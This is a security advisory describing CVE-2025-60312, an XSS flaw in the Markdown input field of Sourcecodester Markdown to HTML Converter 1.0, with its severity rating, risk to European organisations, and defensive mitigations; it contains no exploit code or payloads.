CVE-2025-60312 identifies a Cross-Site Scripting (XSS) vulnerability in Sourcecodester Markdown to HTML Converter version 1.0. The vulnerability resides in the 'Markdown Input' field, where user-supplied input is not properly sanitized or encoded before being converted and rendered as HTML. This flaw allows a remote attacker to inject arbitrary HTML or JavaScript code that executes within the context of the victim's browser session when the victim clicks the 'Convert to HTML' button. The attack vector is network-based (AV:N), requires low attack complexity (AC:L), no privileges (PR:N), but does require user interaction (UI:R). The scope is changed (S:C), meaning the vulnerability affects resources beyond the vulnerable component. The impact affects confidentiality and integrity (C:L/I:L) but not availability (A:N). This vulnerability is classified under CWE-79, which covers improper neutralization of input during web page generation. No patches or fixes have been published yet, and no known exploits are reported in the wild. The vulnerability could be exploited to steal session cookies, perform phishing, or execute malicious scripts in users' browsers, potentially leading to further compromise of user accounts or sensitive data. Given the nature of the tool, which converts Markdown to HTML, it is likely used in web development or content management workflows, increasing the risk if used in environments with untrusted users or inputs.

For European organizations, this vulnerability poses a risk primarily to web applications or internal tools that incorporate the vulnerable Markdown to HTML converter. Exploitation could lead to theft of session tokens, unauthorized actions performed on behalf of users, or delivery of malicious payloads to users within the organization. This could result in data breaches, loss of user trust, and compliance issues under GDPR if personal data is compromised. The requirement for user interaction limits automated exploitation but does not eliminate risk, especially in environments where users may be tricked into clicking the conversion button. Organizations involved in software development, content publishing, or education sectors using this tool or similar converters are at higher risk. The lack of a patch increases exposure time, and attackers may develop exploits once the vulnerability becomes widely known. The impact on confidentiality and integrity is moderate but could escalate if chained with other vulnerabilities.

European organizations should immediately audit their use of Sourcecodester Markdown to HTML Converter v1.0 and identify any instances in production or development environments. Until a patch is available, mitigate risk by restricting access to the tool to trusted users only and disabling public or anonymous access. Implement input validation and sanitization on the Markdown input field to strip or encode potentially malicious HTML or JavaScript content. Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in browsers. Educate users about the risks of clicking conversion buttons when receiving Markdown content from untrusted sources. Monitor logs for unusual activity related to the converter and consider isolating the service in a sandboxed environment. When a patch or update is released, prioritize its deployment. Additionally, consider replacing the vulnerable tool with alternative Markdown converters that have robust security practices and active maintenance.